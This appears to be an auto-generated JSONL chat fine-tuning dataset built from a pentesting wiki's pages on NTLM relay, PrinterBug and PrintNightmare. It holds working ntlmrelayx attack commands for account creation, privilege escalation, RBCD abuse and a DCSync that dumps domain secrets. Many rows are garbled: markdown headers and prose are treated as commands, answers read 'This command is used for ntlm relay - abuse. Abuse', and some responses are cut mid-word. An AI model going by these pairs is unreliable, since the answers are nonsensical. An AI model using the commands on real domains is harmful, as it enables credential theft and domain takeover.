`.html`, `.json` and `.grep` files. It will also gather lots of information regarding the domain users and groups, the computers, [ADCS](../adcs/), etc.", "metadata": {"corpus_index": 966, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Enum`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Enum`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 966, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for NTLM relay - Abuse"}, {"role": "assistant", "content": "=== Creation\n\nThe following command will abuse the default value (i.e. 10) of [`ms-DS-MachineAccountQuota`](../builtins/machineaccountquota.md) to create a domain machine account. The tester will then be able to use it for AD operations."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Explain the practical steps for NTLM relay - Abuse", "response": "=== Creation\n\nThe following command will abuse the default value (i.e. 10) of [`ms-DS-MachineAccountQuota`](../builtins/machineaccountquota.md) to create a domain machine account. The tester will then be able to use it for AD operations.", "metadata": {"corpus_index": 967, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== Creation`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== Creation`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 967, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "Give me the Another command to ntlm relay - abuse"}, {"role": "assistant", "content": "Another way of creating an account is to relay a user that has that right. When the domain user has enough privileges, that account will be promoted to a privileged group."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "Give me the Another command to ntlm relay - abuse", "response": "Another way of creating an account is to relay a user that has that right. When the domain user has enough privileges, that account will be promoted to a privileged group.", "metadata": {"corpus_index": 968, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "Another"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "What are the steps for NTLM relay - Abuse?"}, {"role": "assistant", "content": "Another way of creating an account is to relay a user that has that right. When the domain user has enough privileges, that account will be promoted to a privileged group."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "What are the steps for NTLM relay - Abuse?", "response": "Another way of creating an account is to relay a user that has that right. When the domain user has enough privileges, that account will be promoted to a privileged group.", "metadata": {"corpus_index": 968, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `Another way of creating an account is to relay a user that has that right. When the domain user has enough privileges, that account will be promoted to a privileged group.`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `Another way of creating an account is to relay a user that has that right. When the domain user has enough privileges, that account will be promoted to a privileged group.`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 968, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through NTLM relay - Abuse"}, {"role": "assistant", "content": "> [!TIP]\n> In most cases, the `--remove-mic` option will be needed when relaying to LDAP(S) because of the [MIC protection](relay.md#mic-message-integrity-code).\n\n> [!TIP]\n> Using LDAPS for that operation is not mandatory since Active Directory LDAP implements StartTLS. This is implemented in Impacket since April 30th 2022 ([PR #1305](https://github.com/SecureAuthCorp/impacket/pull/1305)).\n> \n> ```bash\n> ntlmrelayx.py -t ldap://$DC_TARGET --add-computer SHUTDOWN\n> ```\n\n\n=== Promotion\n\nThe following command will try to relay the authentication over LDAPS and escalate the privileges of a domain user by adding it to a privileged group or doing some [ACE abuse](../dacl/) (`--escalate-user`) if the relayed account has sufficient privileges."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through NTLM relay - Abuse", "response": "> [!TIP]\n> In most cases, the `--remove-mic` option will be needed when relaying to LDAP(S) because of the [MIC protection](relay.md#mic-message-integrity-code).\n\n> [!TIP]\n> Using LDAPS for that operation is not mandatory since Active Directory LDAP implements StartTLS. This is implemented in Impacket since April 30th 2022 ([PR #1305](https://github.com/SecureAuthCorp/impacket/pull/1305)).\n> \n> ```bash\n> ntlmrelayx.py -t ldap://$DC_TARGET --add-computer SHUTDOWN\n> ```\n\n\n=== Promotion\n\nThe following command will try to relay the authentication over LDAPS and escalate the privileges of a domain user by adding it to a privileged group or doing some [ACE abuse](../dacl/) (`--escalate-user`) if the relayed account has sufficient privileges.", "metadata": {"corpus_index": 969, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 969, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through NTLM relay - Abuse"}, {"role": "assistant", "content": "> [!TIP]\n> This technique is usually combined with a [PushSubscription abuse (a.k.a. PrivExchange)](../mitm-and-coerced-authentications/#pushsubscription-abuse-a-k-a-privexchange) to force an Exchange server to initiate an authentication, relay it to a domain controller and abuse the default high privileges of Exchange servers in AD domains (`WriteDACL` over domain object, see [Abusing ACEs](../dacl/)) to escalate a domain user privileges (`--escalate-user`).\n\n\n=== Delegation\n\nThe following command will [abuse Resource Based Kerberos Constrained Delegations (RBCD)](../kerberos/delegations/rbcd.md) to gain admin access to the relayed machine. The `--escalate-user` option must be supplied with a controlled machine account name. If no machine account is controlled, the `--add-computer` option can be supplied instead like the \"Account creation\" tab before, and by targeting LDAPS instead of LDAP."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through NTLM relay - Abuse", "response": "> [!TIP]\n> This technique is usually combined with a [PushSubscription abuse (a.k.a. PrivExchange)](../mitm-and-coerced-authentications/#pushsubscription-abuse-a-k-a-privexchange) to force an Exchange server to initiate an authentication, relay it to a domain controller and abuse the default high privileges of Exchange servers in AD domains (`WriteDACL` over domain object, see [Abusing ACEs](../dacl/)) to escalate a domain user privileges (`--escalate-user`).\n\n\n=== Delegation\n\nThe following command will [abuse Resource Based Kerberos Constrained Delegations (RBCD)](../kerberos/delegations/rbcd.md) to gain admin access to the relayed machine. The `--escalate-user` option must be supplied with a controlled machine account name. If no machine account is controlled, the `--add-computer` option can be supplied instead like the \"Account creation\" tab before, and by targeting LDAPS instead of LDAP.", "metadata": {"corpus_index": 970, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `> [!TIP]`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `> [!TIP]`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 970, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps."}, {"role": "user", "content": "What is the If syntax for ntlm relay - abuse?"}, {"role": "assistant", "content": "If successful, the attacker will then be able to get a service ticket with the created domain machine account for the relayed victim and impersonate any account (e.g. the domain admin) on it."}], "system": "You are a penetration testing tool expert. Provide the exact command or sequence of commands to accomplish the task, including required flags and arguments. Format multi-step operations as numbered steps.", "user": "What is the If syntax for ntlm relay - abuse?", "response": "If successful, the attacker will then be able to get a service ticket with the created domain machine account for the relayed victim and impersonate any account (e.g. the domain admin) on it.", "metadata": {"corpus_index": 971, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "tool_command", "tool": "If"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on NTLM relay - Abuse"}, {"role": "assistant", "content": "If successful, the attacker will then be able to get a service ticket with the created domain machine account for the relayed victim and impersonate any account (e.g. the domain admin) on it."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on NTLM relay - Abuse", "response": "If successful, the attacker will then be able to get a service ticket with the created domain machine account for the relayed victim and impersonate any account (e.g. the domain admin) on it.", "metadata": {"corpus_index": 971, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `If successful, the attacker will then be able to get a service ticket with the created domain machine account for the relayed victim and impersonate any account (e.g. the domain admin) on it.`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `If successful, the attacker will then be able to get a service ticket with the created domain machine account for the relayed victim and impersonate any account (e.g. the domain admin) on it.`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 971, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "How would I carry out NTLM relay - Abuse during a pentest?"}, {"role": "assistant", "content": "=== DCSync\n\nA [DCSync](../credentials/dumping/dcsync.md) can also be operated with a relayed NTLM authentication, but only if the target domain controller is vulnerable to [Zerologon](../netlogon/zerologon.md) since the DRSUAPI always requires signing."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "How would I carry out NTLM relay - Abuse during a pentest?", "response": "=== DCSync\n\nA [DCSync](../credentials/dumping/dcsync.md) can also be operated with a relayed NTLM authentication, but only if the target domain controller is vulnerable to [Zerologon](../netlogon/zerologon.md) since the DRSUAPI always requires signing.", "metadata": {"corpus_index": 972, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "attack_command"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What does this command do: `=== DCSync`?"}, {"role": "assistant", "content": "This command is used for ntlm relay - abuse. Abuse"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What does this command do: `=== DCSync`?", "response": "This command is used for ntlm relay - abuse. Abuse", "metadata": {"corpus_index": 972, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "cmd_explain"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "What should I know about target vulnerable to Zerologon, dump Domain's secrets?"}, {"role": "assistant", "content": "ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'\n```\n\n:::"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "What should I know about target vulnerable to Zerologon, dump Domain's secrets?", "response": "ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'\n```\n\n:::", "metadata": {"corpus_index": 973, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on target vulnerable to Zerologon, dump Domain's secrets"}, {"role": "assistant", "content": "ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'\n```\n\n:::"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on target vulnerable to Zerologon, dump Domain's secrets", "response": "ntlmrelayx.py -t dcsync://'DOMAINCONTROLLER' -auth-smb 'DOMAIN'/'LOW_PRIV_USER':'PASSWORD'\n```\n\n:::", "metadata": {"corpus_index": 973, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of NTLM relay - Tips & tricks :bulb:"}, {"role": "assistant", "content": "The ntlmrelayx tool offers features making it a very valuable asset when pentesting an Active Directory domain:\n\n* It can work with mitm6 (for DHCPv6 + DNS poisoning) by enabling IPv6 support with the -6 option (IPv6 support is not required since most hosts will send IPv4 but using this option is recommended since it will allow relay servers to work with IPv4 and IPv6)\n* It supports SMB2. It can be enabled with the -smb2support option\n* It implements CVE-2019-1040 with the --remove-mic option, usually needed when attempting \"cross-protocols unsigning relays\" (e.g. SMB to SMB-with-required-signing, or SMB to LDAP/S). This option can also be used when NTLMv1 is allowed (NTLMv1 doesn't support MIC).\n* it implements CVE-2019-1019 with the -remove-target and -machine-account arguments\n* It has the ability to attack multiple targets with the -tf option instead of -t, and the -w option can be set to watch the target file for changes and update target list automatically\n* the target can be specified with a target protocol like ldap://target but the \"all\" keyword can be used (all://target). If the protocol isn't specified, it defaults to smb.\n* It has the ability to relay connections for specific target users to be defined in the targets file\n* It has the ability to relay a single connection (SMB only for now) to multiple targets, see below\n\n> [!TIP]\n> Thanks to the \"multi-relay\" feature, another attacker machine/interface can be added to the targets to combine ntlmrelayx with Responder servers. The attackers will be able capture an NTLM response with a custom challenge on an interface/machine, while relaying on another.\n\n![](assets/capture_and_relay.png)\n\n> [!TIP]\n> The targets file used with the -tf option can contain the following\n> \n> ``bash\n> # User filter for SMB only (for now)\n> smb://DOMAIN\\User@192.168.1.101\n> smb://User@192.168.1.101\n> \n> # Custom ports and paths can be specified\n> smb://target:port\n> http://target:port/somepath\n> \n> # Domain name can be used inste"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of NTLM relay - Tips & tricks :bulb:", "response": "The ntlmrelayx tool offers features making it a very valuable asset when pentesting an Active Directory domain:\n\n* It can work with mitm6 (for DHCPv6 + DNS poisoning) by enabling IPv6 support with the -6 option (IPv6 support is not required since most hosts will send IPv4 but using this option is recommended since it will allow relay servers to work with IPv4 and IPv6)\n* It supports SMB2. It can be enabled with the -smb2support option\n* It implements CVE-2019-1040 with the --remove-mic option, usually needed when attempting \"cross-protocols unsigning relays\" (e.g. SMB to SMB-with-required-signing, or SMB to LDAP/S). This option can also be used when NTLMv1 is allowed (NTLMv1 doesn't support MIC).\n* it implements CVE-2019-1019 with the -remove-target and -machine-account arguments\n* It has the ability to attack multiple targets with the -tf option instead of -t, and the -w option can be set to watch the target file for changes and update target list automatically\n* the target can be specified with a target protocol like ldap://target but the \"all\" keyword can be used (all://target). If the protocol isn't specified, it defaults to smb.\n* It has the ability to relay connections for specific target users to be defined in the targets file\n* It has the ability to relay a single connection (SMB only for now) to multiple targets, see below\n\n> [!TIP]\n> Thanks to the \"multi-relay\" feature, another attacker machine/interface can be added to the targets to combine ntlmrelayx with Responder servers. The attackers will be able capture an NTLM response with a custom challenge on an interface/machine, while relaying on another.\n\n![](assets/capture_and_relay.png)\n\n> [!TIP]\n> The targets file used with the -tf option can contain the following\n> \n> ``bash\n> # User filter for SMB only (for now)\n> smb://DOMAIN\\User@192.168.1.101\n> smb://User@192.168.1.101\n> \n> # Custom ports and paths can be specified\n> smb://target:port\n> http://target:port/somepath\n> \n> # Domain name can be used inste", "metadata": {"corpus_index": 974, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Give me a guide on NTLM relay - Tips & tricks :bulb:"}, {"role": "assistant", "content": "The ntlmrelayx tool offers features making it a very valuable asset when pentesting an Active Directory domain:\n\n* It can work with mitm6 (for DHCPv6 + DNS poisoning) by enabling IPv6 support with the -6 option (IPv6 support is not required since most hosts will send IPv4 but using this option is recommended since it will allow relay servers to work with IPv4 and IPv6)\n* It supports SMB2. It can be enabled with the -smb2support option\n* It implements CVE-2019-1040 with the --remove-mic option, usually needed when attempting \"cross-protocols unsigning relays\" (e.g. SMB to SMB-with-required-signing, or SMB to LDAP/S). This option can also be used when NTLMv1 is allowed (NTLMv1 doesn't support MIC).\n* it implements CVE-2019-1019 with the -remove-target and -machine-account arguments\n* It has the ability to attack multiple targets with the -tf option instead of -t, and the -w option can be set to watch the target file for changes and update target list automatically\n* the target can be specified with a target protocol like ldap://target but the \"all\" keyword can be used (all://target). If the protocol isn't specified, it defaults to smb.\n* It has the ability to relay connections for specific target users to be defined in the targets file\n* It has the ability to relay a single connection (SMB only for now) to multiple targets, see below\n\n> [!TIP]\n> Thanks to the \"multi-relay\" feature, another attacker machine/interface can be added to the targets to combine ntlmrelayx with Responder servers. The attackers will be able capture an NTLM response with a custom challenge on an interface/machine, while relaying on another.\n\n![](assets/capture_and_relay.png)\n\n> [!TIP]\n> The targets file used with the -tf option can contain the following\n> \n> ``bash\n> # User filter for SMB only (for now)\n> smb://DOMAIN\\User@192.168.1.101\n> smb://User@192.168.1.101\n> \n> # Custom ports and paths can be specified\n> smb://target:port\n> http://target:port/somepath\n> \n> # Domain name can be used inste"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Give me a guide on NTLM relay - Tips & tricks :bulb:", "response": "The ntlmrelayx tool offers features making it a very valuable asset when pentesting an Active Directory domain:\n\n* It can work with mitm6 (for DHCPv6 + DNS poisoning) by enabling IPv6 support with the -6 option (IPv6 support is not required since most hosts will send IPv4 but using this option is recommended since it will allow relay servers to work with IPv4 and IPv6)\n* It supports SMB2. It can be enabled with the -smb2support option\n* It implements CVE-2019-1040 with the --remove-mic option, usually needed when attempting \"cross-protocols unsigning relays\" (e.g. SMB to SMB-with-required-signing, or SMB to LDAP/S). This option can also be used when NTLMv1 is allowed (NTLMv1 doesn't support MIC).\n* it implements CVE-2019-1019 with the -remove-target and -machine-account arguments\n* It has the ability to attack multiple targets with the -tf option instead of -t, and the -w option can be set to watch the target file for changes and update target list automatically\n* the target can be specified with a target protocol like ldap://target but the \"all\" keyword can be used (all://target). If the protocol isn't specified, it defaults to smb.\n* It has the ability to relay connections for specific target users to be defined in the targets file\n* It has the ability to relay a single connection (SMB only for now) to multiple targets, see below\n\n> [!TIP]\n> Thanks to the \"multi-relay\" feature, another attacker machine/interface can be added to the targets to combine ntlmrelayx with Responder servers. The attackers will be able capture an NTLM response with a custom challenge on an interface/machine, while relaying on another.\n\n![](assets/capture_and_relay.png)\n\n> [!TIP]\n> The targets file used with the -tf option can contain the following\n> \n> ``bash\n> # User filter for SMB only (for now)\n> smb://DOMAIN\\User@192.168.1.101\n> smb://User@192.168.1.101\n> \n> # Custom ports and paths can be specified\n> smb://target:port\n> http://target:port/somepath\n> \n> # Domain name can be used inste", "metadata": {"corpus_index": 974, "category": "active_directory", "source_file": "docs/src/ad/movement/ntlm/relay.md", "page_title": "NTLM relay", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Give me an overview of PrinterBug"}, {"role": "assistant", "content": "This vulnerability allows low-privileged users to coerce authentications from machines that run the Print Spooler Service by crafting a specific RPC call through MS-RPRN, Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server\n\n> [!TIP]\n> Read the ms-rprn.md for more insight"}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Give me an overview of PrinterBug", "response": "This vulnerability allows low-privileged users to coerce authentications from machines that run the Print Spooler Service by crafting a specific RPC call through MS-RPRN, Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server\n\n> [!TIP]\n> Read the ms-rprn.md for more insight", "metadata": {"corpus_index": 975, "category": "active_directory", "source_file": "docs/src/ad/movement/print-spooler-service/printerbug.md", "page_title": "PrinterBug", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Walk me through PrinterBug"}, {"role": "assistant", "content": "This vulnerability allows low-privileged users to coerce authentications from machines that run the Print Spooler Service by crafting a specific RPC call through MS-RPRN, Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server\n\n> [!TIP]\n> Read the ms-rprn.md for more insight"}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax.", "user": "Walk me through PrinterBug", "response": "This vulnerability allows low-privileged users to coerce authentications from machines that run the Print Spooler Service by crafting a specific RPC call through MS-RPRN, Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server\n\n> [!TIP]\n> Read the ms-rprn.md for more insight", "metadata": {"corpus_index": 975, "category": "active_directory", "source_file": "docs/src/ad/movement/print-spooler-service/printerbug.md", "page_title": "PrinterBug", "augmentation_kind": "none", "row_kind": "technique_howto"}} {"messages": [{"role": "system", "content": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved."}, {"role": "user", "content": "Explain PrintNightmare - The print spooler"}, {"role": "assistant", "content": "The Print Spooler is a Microsoft built-in service that manages printing jobs. It is enabled by default and runs within the SYSTEM context.\n\n3 RPC protocols are registered by the spooler:\n\n* MS-RPRN: Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server synchronously.\n* MS-PAR: Microsoft’s Print System Asynchronous Remote Protocol. It has the same functionalities as MS-RPRN, but works asynchronously.\n* MS-PAN: Microsoft’s Print System Asynchronous Notification Protocol. It is used to receive print status notifications from a print server and to send server-requested responses to those notifications back to the server."}], "system": "You are a cybersecurity educator. Explain the requested concept, attack technique, or defense mechanism clearly and thoroughly, covering how it works, why it matters, and what tools or conditions are involved.", "user": "Explain PrintNightmare - The print spooler", "response": "The Print Spooler is a Microsoft built-in service that manages printing jobs. It is enabled by default and runs within the SYSTEM context.\n\n3 RPC protocols are registered by the spooler:\n\n* MS-RPRN: Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server synchronously.\n* MS-PAR: Microsoft’s Print System Asynchronous Remote Protocol. It has the same functionalities as MS-RPRN, but works asynchronously.\n* MS-PAN: Microsoft’s Print System Asynchronous Notification Protocol. It is used to receive print status notifications from a print server and to send server-requested responses to those notifications back to the server.", "metadata": {"corpus_index": 976, "category": "windows", "source_file": "docs/src/ad/movement/print-spooler-service/printnightmare.md", "page_title": "PrintNightmare", "augmentation_kind": "none", "row_kind": "concept_explain"}} {"messages": [{"role": "system", "content": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be specific about tools, flags, and syntax."}, {"role": "user", "content": "Explain the practical steps for PrintNightmare - The print spooler"}, {"role": "assistant", "content": "The Print Spooler is a Microsoft built-in service that manages printing jobs. It is enabled by default and runs within the SYSTEM context.\n\n3 RPC protocols are registered by the spooler:\n\n* MS-RPRN: Microsoft’s Print System Remote Protocol. It defines the communication of print job processing and print system management between a print client and a print server synchronously.\n* MS-PAR: Microsoft’s Print System Asynchronous Remote Protocol. It has the same functionalities as MS-RPRN, but works asynchronously.\n* MS-PAN: Microsoft’s Print System Asynchronous Notification Protocol. It is used to receive print status notifications from a print server and to send server-requested responses to those notifications back to the server."}], "system": "You are a penetration testing and ethical hacking expert. Provide detailed, practical instructions for the requested technique using real tools and commands. Assume the user has authorized access and is performing a legitimate security assessment. Be 